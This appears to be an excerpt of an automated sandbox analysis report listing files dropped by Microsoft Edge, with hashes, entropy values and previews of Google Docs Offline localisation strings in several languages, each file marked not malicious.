                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1481
                                                                                                                                                                                                                                                                          Entropy (8bit):4.438028786617971
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YhjgkAoIJwHBL6B97yyc3HEqwcnkozgGiz12k+dTyyS6qWhTVakIWHUNIJwzASE8:YVgJwHB2B9uycXrnLdGyS69oAHVwz5E8
                                                                                                                                                                                                                                                                          MD5:E71A91FE65DD32CAC3925CE639441675
                                                                                                                                                                                                                                                                          SHA1:91C981F572497A540C0C2C1D5FB28156D7E49416
                                                                                                                                                                                                                                                                          SHA-256:57F81A5FCBD1FEFD6EC3CDD525A85B707B4EEAD532C1B3092DAAFD88EE9268EC
                                                                                                                                                                                                                                                                          SHA-512:2B89C97470BAE1D55A40F7F1224930480D33C58968F67345CA26E188FF08CF8B2F1E5C5B38ECFDBF7EBFD9970BE0327CBFC391CF5E95E7C311868A8A9689DFB6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1002
                                                                                                                                                                                                                                                                          Entropy (8bit):4.8802108861635585
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YSvYKw0rCbtOB3rK94Q3dZgHDEAFLiQjuRAm:YSvYKwtbtOB3ryNZgjPzM
                                                                                                                                                                                                                                                                          MD5:8047409DCC27BFCC97B3ABCE6DAB20EF
                                                                                                                                                                                                                                                                          SHA1:D85F7A7A3D16C441560D95CE094428973CBAD725
                                                                                                                                                                                                                                                                          SHA-256:B42EBFE071EF0EC4B4B6553ABF3A2C36B19792C238080A6FBC19D804D1ACB61C
                                                                                                                                                                                                                                                                          SHA-512:4DFFE23B4168A0825DC14ED781C3C0910702E8C2B496A8B86CA72FDBBA242F34FE430D6B2A219C4A189907E92B1A7B02CE2B4B9A54088222F5AF49878E385AA4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SUKURTI NAUJ\u0104"},"explanationofflinedisabled":{"message":"Esate neprisijung\u0119. Jei norite naudoti \u201eGoogle\u201c dokumentus be interneto ry\u0161io, pagrindiniame \u201eGoogle\u201c dokument\u0173 puslapyje eikite \u012f nustatym\u0173 skilt\u012f ir \u012fjunkite sinchronizavim\u0105 neprisijungus, kai kit\u0105 kart\u0105 b\u016bsite prisijung\u0119 prie interneto."},"explanationofflineenabled":{"message":"Esate neprisijung\u0119, bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj\u0173."},"extdesc":{"message":"Redaguokite, kurkite ir per\u017ei\u016br\u0117kite savo dokumentus, skai\u010diuokles ir pristatymus \u2013 visk\u0105 darykite be prieigos prie interneto."},"extname":{"message":"\u201eGoogle\u201c dokumentai neprisijungus"},"learnmore":{"message":"Su\u017einoti daugiau"},"popuphelptext":{"message":"Ra\u0161ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry\u0161\u012f arba nenaudodami jo."}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2824
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8290584520300373
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YdYlznMbTiR6ZEpJpVznNRlznoJoZK4EbOZEXZznx5Y9Zc+qYEe4:uMouV57Ao/CZ9F
                                                                                                                                                                                                                                                                          MD5:34CE3FA84E699BCE78E026D0F0A0C705
                                                                                                                                                                                                                                                                          SHA1:5C56D09AF53D521FE4224A77AA66E61A3B0165CA
                                                                                                                                                                                                                                                                          SHA-256:275E7FADB93A810328E3ADEAD8754DD0A19A062D5D20A872F7471FFAB47AA7B3
                                                                                                                                                                                                                                                                          SHA-512:3A6CD2EA06B664689F089D35FCFA41B36C22B1D77CF78F66D0F5DCDC52A6BB29F7566D377B81EDCE6001B71CB7F1E1247D3D71965BAA2E8EA9E6DEAA208CF25B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):758
                                                                                                                                                                                                                                                                          Entropy (8bit):4.58900710997284
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGTzZxePwmwt69tynax7wrQ1gdUNIyk9WMwuwSQhxXzDyrjgQO:YudUwmwsynaPGdUNILcWwfxDyrj9O
                                                                                                                                                                                                                                                                          MD5:66439BA3ED5BA0C702EF94793E15DE83
                                                                                                                                                                                                                                                                          SHA1:2B3CA2C2BE15207DEAE55E1D667C9DCDC9241C74
                                                                                                                                                                                                                                                                          SHA-256:B3ECE279943B28C8D855EC86AC1CE53BDFB6A709240D653508764493A75F7518
                                                                                                                                                                                                                                                                          SHA-512:8B393F3BE96020181A12A16FAFDAE9DF555B09A7B03CC855009B26A48B0C7D583476A72BB28224E419D300013FE272316C2CB35DE8D67DBAB454B7CAE8DF6B94
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"OPPRETT NYTT"},"explanationofflinedisabled":{"message":"Du er uten nett. For \u00e5 bruke Google Dokumenter uten internettilkobling, g\u00e5 til innstillingene p\u00e5 Google Dokumenter-nettsiden og sl\u00e5 p\u00e5 synkronisering uten nett neste gang du er koblet til Internett."},"explanationofflineenabled":{"message":"Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye."},"extdesc":{"message":"Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine \u2013 uten nettilgang."},"extname":{"message":"Google Dokumenter uten nett"},"learnmore":{"message":"Finn ut mer"},"popuphelptext":{"message":"Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                          Entropy (8bit):5.03221369527458
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YG7xzyFrRo+Hj9iragSZyoifI3zMtuaxSmD2zO1gdGEsK/ULjPAbHGjKq4OqQyXr:YU0BDsbIm7kd9rYcbm2PQzb9JDeaTe9
                                                                                                                                                                                                                                                                          MD5:10BA7FE4CAB38642419BE8FEF9E78178
                                                                                                                                                                                                                                                                          SHA1:FDDD00441DCCFF459F8ABCA12BA1856B9B1E299B
                                                                                                                                                                                                                                                                          SHA-256:6538F562BD1BAA828C0EF0ADC5F7C96B4A0EB7814E6B9A2B585E4D3B92B0E61D
                                                                                                                                                                                                                                                                          SHA-512:07E490D44F8F8A2BDC2D4AD15753AD16E39D17693219418B02820D26558FBE3FCE8A8583BAE0ED876ACC6326080867D05A732CD9A4C24B620753B84BDA4AC031
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"UTW\u00d3RZ NOWY"},"explanationofflinedisabled":{"message":"Jeste\u015b offline. Aby korzysta\u0107 z Dokument\u00f3w Google bez po\u0142\u0105czenia internetowego, otw\u00f3rz ustawienia na stronie g\u0142\u00f3wnej Dokument\u00f3w Google i w\u0142\u0105cz synchronizacj\u0119 offline nast\u0119pnym razem, gdy b\u0119dziesz mie\u0107 dost\u0119p do internetu."},"explanationofflineenabled":{"message":"Jeste\u015b offline, ale nadal mo\u017cesz edytowa\u0107 dost\u0119pne pliki i tworzy\u0107 nowe."},"extdesc":{"message":"Edytuj, tw\u00f3rz i wy\u015bwietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno\u015bci \u0142\u0105czenia si\u0119 z internetem."},"extname":{"message":"Dokumenty Google offline"},"learnmore":{"message":"Wi\u0119cej informacji"},"popuphelptext":{"message":"Pisz, edytuj i wsp\u00f3\u0142pracuj, gdziekolwiek jeste\u015b \u2013 niezale\u017cnie od tego, czy masz po\u0142\u0105czenie z internetem."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                          Entropy (8bit):4.836475333440799
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGN0xLwuNuOHViHfVMVIkHKX3x+g93dxaX6M5Vgdt70YRpRyHmfXZjv7n:YtBw+u1HfYIIE3tdxaKM0dhhRHN7
                                                                                                                                                                                                                                                                          MD5:EE122CF26EBE1AD0CC733B117A89FF3B
                                                                                                                                                                                                                                                                          SHA1:A7C21E40AB7C934B35D725B3E21E4CB8EA85BC1E
                                                                                                                                                                                                                                                                          SHA-256:4ECEDB9C1F3DD0D0E3AEB86146561B3D7E58656CBDBED1A39B91737B52EC7F2C
                                                                                                                                                                                                                                                                          SHA-512:4866FBEA6C8698EB3C8923B9875186C800519488784683C18E5E6523681C52429E7BA38A304E0D1B17A3997A2F4C8C3A5E9FB518466A910B119F65D7DD62B77D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREEAZ\u0102 UN DOCUMENT"},"explanationofflinedisabled":{"message":"E\u0219ti offline. Pentru a utiliza Documente Google f\u0103r\u0103 conexiune la internet, intr\u0103 \u00een set\u0103rile din pagina principal\u0103 Documente Google \u0219i activeaz\u0103 sincronizarea offline data viitoare c\u00e2nd e\u0219ti conectat(\u0103) la internet."},"explanationofflineenabled":{"message":"E\u0219ti offline, dar po\u021bi \u00eenc\u0103 s\u0103 editezi fi\u0219ierele disponibile sau s\u0103 creezi altele."},"extdesc":{"message":"Editeaz\u0103, creeaz\u0103 \u0219i acceseaz\u0103 documente, foi de calcul \u0219i prezent\u0103ri - totul f\u0103r\u0103 acces la internet."},"extname":{"message":"Documente Google Offline"},"learnmore":{"message":"Afl\u0103 mai multe"},"popuphelptext":{"message":"Scrie, editeaz\u0103 \u0219i colaboreaz\u0103 oriunde ai fi, cu sau f\u0103r\u0103 conexiune la internet."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):855
                                                                                                                                                                                                                                                                          Entropy (8bit):4.747197911597479
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGgx11/KXowwJrpv8wNgEcPJJJEEXLW5xwJuj4aj3gdyKDxXDMNuwMwu8KnJ4dOl:Yzt/KYw8VtNLcaECmajwdNdXDinWaNO
                                                                                                                                                                                                                                                                          MD5:9CDFA5371F28427F129D200338C47494
                                                                                                                                                                                                                                                                          SHA1:19653347E92967564BD8DF14FDE2EEA2DC87BCEB
                                                                                                                                                                                                                                                                          SHA-256:75D018CC8525605DDC591F6BFE5BDAA2EFB164934E9D5438972651F8C818D581
                                                                                                                                                                                                                                                                          SHA-512:E6122FD5C8D387A999EF57C877BB70C896C1012B592333BCF2B93E44F7E8BA487F264E83CDEFBBDE972040CF6DC8F14A4A9E0E0BCA85CF1F9EAA35B817DD2869
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"USTVARI NOVO"},"explanationofflinedisabled":{"message":"Nimate vzpostavljene povezave. \u010ce \u017eelite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma\u010di strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji\u010d vzpostavite internetno povezavo."},"explanationofflineenabled":{"message":"Nimate vzpostavljene povezave, vendar lahko \u0161e vedno urejate razpolo\u017eljive datoteke ali ustvarjate nove."},"extdesc":{"message":"Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve \u2013 vse to brez internetnega dostopa."},"extname":{"message":"Google Dokumenti brez povezave"},"learnmore":{"message":"Ve\u010d o tem"},"popuphelptext":{"message":"Pi\u0161ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2868
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5980354067400313
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YTDQ8m6jQLQgILQszrCQHUij6VQqTTkLQqZb+i/6JVjElQFs3QFpQcZQIXi/6JV3:1UFUzYDKiwIbCLvi6j6f2riOI8
                                                                                                                                                                                                                                                                          MD5:C2026342237E7686B1932AF5B54F8110
                                                                                                                                                                                                                                                                          SHA1:5AF235B29947C7F770070F0A693979D9191FADB5
                                                                                                                                                                                                                                                                          SHA-256:A3EB276FBD19DCE2B00DB6937578B214B9E33D67487659FE0BF21A86225ECE73
                                                                                                                                                                                                                                                                          SHA-512:2CE6FFFA4EA16AAC65ACC8B5C1C9952EAE1AC8891589266735C3EF0A0D20E2FA76940E6401D86EEF5C87A1D24C1CC9A1CAAF1C66819C56505B0B2860BFE5ACFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):840
                                                                                                                                                                                                                                                                          Entropy (8bit):4.608011285510927
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:YGqWxSLB1HMHyMhybK7QGU78oCuafIvQx3LB6EYPE5E1pKgdJONfw+yehEL5cTT3:YvWknQ3y0Q/KjVFKzFdSo+ye0cTTBaQ
                                                                                                                                                                                                                                                                          MD5:84EB1D6E827E40C578469EAAB778E368
                                                                                                                                                                                                                                                                          SHA1:3F53DE16AB05F7E03AE6C8605C2339043C1A385F
                                                                                                                                                                                                                                                                          SHA-256:2C6B42D122943DC0CA92A33074D1A607351D3BC7F9768E174617FA7011A3DE9F
                                                                                                                                                                                                                                                                          SHA-512:7A7CE81FA8BE309D347AE0975FD6FCD904BC1EE86342DC0E88E789E7CF5967EDD0DDCCB9BA156510E74B025A23D479B6058101FFBB648C5D30C311F5BA1DFC6B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"FUNGUA MPYA"},"explanationofflinedisabled":{"message":"Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao."},"explanationofflineenabled":{"message":"Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya."},"extdesc":{"message":"Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako \u2014 yote bila kutumia muunganisho wa intaneti."},"extname":{"message":"Hati za Google Nje ya Mtandao"},"learnmore":{"message":"Pata Maelezo Zaidi"},"popuphelptext":{"message":"Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna."}}.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3286
                                                                                                                                                                                                                                                                          Entropy (8bit):3.746723088270005
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YJp0pi1W3o6TcKJq0pwHZycPuYpJ3bhpAcinp+MDtUpdp7cz7XvyYpZkFS4S/duW:QzW3RTcLxcEELdCS/du2dE4N8/cgp+
                                                                                                                                                                                                                                                                          MD5:24626AD7B8058866033738380776F59B
                                                                                                                                                                                                                                                                          SHA1:A6ABD9AB8BA022EA6619252DF8422BF5F73B6A24
                                                                                                                                                                                                                                                                          SHA-256:3FC7F56F6D6D514B32547509B39F6380FC786EFBCCA4B9859F204456CA2E7957
                                                                                                                                                                                                                                                                          SHA-512:4FA2F084175D71923AE3186C8195781E1946F6C19B1A4BF659D3AE2DC45F1AC2F84D794B4487EC5E030EA899EE1DECF07B3CDD3EB0D3DDA996C5FF8A272CF97A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0baa\u0bc1\u0ba4\u0bbf\u0baf \u0b86\u0bb5\u0ba3\u0ba4\u0bcd\u0ba4\u0bc8 \u0b89\u0bb0\u0bc1\u0bb5\u0bbe\u0b95\u0bcd\u0b95\u0bc1"},"explanationofflinedisabled":{"message":"\u0b86\u0b83\u0baa\u0bcd\u0bb2\u0bc8\u0ba9\u0bbf\u0bb2\u0bcd \u0b89\u0bb3\u0bcd\u0bb3\u0bc0\u0bb0\u0bcd\u0b95\u0bb3\u0bcd. \u0b87\u0ba3\u0bc8\u0baf \u0b87\u0ba3\u0bc8\u0baa\u0bcd\u0baa\u0bc1 \u0b87\u0ba9\u0bcd\u0bb1\u0bbf Google \u0b86\u0bb5\u0ba3\u0ba4\u0bcd\u0ba4\u0bc8\u0baa\u0bcd \u0baa\u0baf\u0ba9\u0bcd\u0baa\u0b9f\u0bc1\u0ba4\u0bcd\u0ba4, \u0b85\u0b9f\u0bc1\u0ba4\u0bcd\u0ba4 \u0bae\u0bc1\u0bb1\u0bc8 \u0b87\u0ba3\u0bc8\u0baf\u0ba4\u0bcd\u0ba4\u0bc1\u0b9f\u0ba9\u0bcd \u0b87\u0ba3\u0bc8\u0b95\u0bcd\u0b95\u0bc1\u0bae\u0bcd \u0baa\u0bcb\u0ba4\u0bc1, Google \u0b86\u0bb5\u0ba3 \u0bae\u0bc1\u0b95\u0baa\u0bcd\u0baa\u0bc1\u0baa\u0bcd\u0baa\u0b95\u0bcd\u0b95\u0ba4\u0bcd\u0ba4\u0bbf\u0bb2\u0bcd \u0b85\u0bae\u0bc8\u0baa\u0bcd\u0baa\u0bc1\u0b95\u0bb3\u0bc1\u0b95\u0bcd\u0b95\u0bc1\u0b9a\u0bcd \u0b9a\u0
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                          Entropy (8bit):4.85701156608368
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YjFxFDocXDmcHAc4KhrUdPuWDM43rXecHg:YjFPDtDmIVdh07DM2c
                                                                                                                                                                                                                                                                          MD5:3104BCD0D4AD6B47FE36F36C1B5AA333
                                                                                                                                                                                                                                                                          SHA1:36EC46C7230487C0D26E185AA82F340D8312A265
                                                                                                                                                                                                                                                                          SHA-256:AC2894CEA6332450095A7F8FC9B97550DA87E4B4B6E6FB95DF1A1F49F25E0E35
                                                                                                                                                                                                                                                                          SHA-512:873A8E1EC1EB2B482794C51DBFDD5B96CB9E8E2B5A74DB3C3B54AE78A396585FAEC402A054FF332551B5EBCFC4A57BFC5BD92D08F9F73ACB433EFE9A18D89CD3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"YEN\u0130 OLU\u015eTUR"},"explanationofflinedisabled":{"message":"\u0130nternet'e ba\u011fl\u0131 de\u011filsiniz. Google Dok\u00fcmanlar'\u0131 \u0130nternet ba\u011flant\u0131s\u0131 olmadan kullanmak i\u00e7in, \u0130nternet'e ba\u011flanabildi\u011finizde Google Dok\u00fcmanlar ana sayfas\u0131nda Ayarlar'a gidin ve \u00e7evrimd\u0131\u015f\u0131 senkronizasyonu etkinle\u015ftirin."},"explanationofflineenabled":{"message":"\u0130nternet'e ba\u011fl\u0131 de\u011filsiniz. Ancak, yine de mevcut dosyalar\u0131 d\u00fczenleyebilir veya yeni dosyalar olu\u015fturabilirsiniz."},"extdesc":{"message":"Dok\u00fcman, e-tablo ve sunu olu\u015fturun, bunlar\u0131 d\u00fczenleyin ve g\u00f6r\u00fcnt\u00fcleyin. T\u00fcm bu i\u015flemleri internet eri\u015fimi olmadan yapabilirsiniz."},"extname":{"message":"Google Dok\u00fcmanlar \u00c7evrimd\u0131\u015f\u0131"},"learnmore":{"message":"Daha Fazla Bilgi"},"popuphelptext":{"message":"\u0130nternet ba\u011flant\u0131n\u0131
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2925
                                                                                                                                                                                                                                                                          Entropy (8bit):3.605034846503948
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y4o1Qs91QLrjrZLQO3Qq1R3yNQikZd14D6VQxHoQ3cQs9NQ4hQwrQ8QcxQApQbnm:Ro136p5VRempdkcvhhhRXHTPQYVu8dHB
                                                                                                                                                                                                                                                                          MD5:AE938164F7AC0E7C7F120742DE2BEB1E
                                                                                                                                                                                                                                                                          SHA1:FC49041249EAEF40632F27FAA8561582D510D4E3
                                                                                                                                                                                                                                                                          SHA-256:08978A1425DEC304483BBB7DD0E55A7D850C4561ABD41BAC1BE5D93D70465174
                                                                                                                                                                                                                                                                          SHA-512:B3F252885F9D7E4D74A5880B5FA60447511D4E2DCE64DB8EDE5BD1B144F0F09A3C784649C2E1623A034DDD50B6B7FF990A3A6FC58C3AE124646C31F35B0B20FD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u041e\u0420\u0418\u0422\u0418"},"explanationofflinedisabled":{"message":"\u0412\u0438 \u0432 \u0440\u0435\u0436\u0438\u043c\u0456 \u043e\u0444\u043b\u0430\u0439\u043d. \u0429\u043e\u0431 \u043a\u043e\u0440\u0438\u0441\u0442\u0443\u0432\u0430\u0442\u0438\u0441\u044f Google \u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0431\u0435\u0437 \u0437\u2019\u0454\u0434\u043d\u0430\u043d\u043d\u044f \u0437 \u0406\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u043e\u043c, \u043f\u0435\u0440\u0435\u0439\u0434\u0456\u0442\u044c \u0443 \u043d\u0430\u043b\u0430\u0448\u0442\u0443\u0432\u0430\u043d\u043d\u044f \u043d\u0430 \u0434\u043e\u043c\u0430\u0448\u043d\u0456\u0439 \u0441\u0442\u043e\u0440\u0456\u043d\u0446\u0456 Google \u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0456\u0432 \u0456 \u0432\u0432\u0456\u043c\u043a\u043d\u0456\u0442\u044c \u043e\u0444\u043b\u0430\u0439\u043d-\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0456\u0437\u0430
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1222
                                                                                                                                                                                                                                                                          Entropy (8bit):4.477774650892186
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YfC5eWpbTu5ViOswIBd5ayo4ErdI0+75CVekIdq5XEEbB:Yf6HuOn17Z/EpI08Tdq5/bB
                                                                                                                                                                                                                                                                          MD5:E910D3F03F0349F5C8A6A541107375D5
                                                                                                                                                                                                                                                                          SHA1:2F3482194C98ECBD58A42BD29BB853267C49A39A
                                                                                                                                                                                                                                                                          SHA-256:3893C066A36FE95F06F3C49091A20290D4E071183755F40AF05455660BEDA2DC
                                                                                                                                                                                                                                                                          SHA-512:387CA0727AD0869041296182F17555F55552245D38284A1D5D2652B72959CC94DD345F8A1D6D15F7F5477817DF9AFA045F2267269D0D66938C7D401B4CA2EB4B
                                                                                                                                                                                                                                                                          Malicious:false
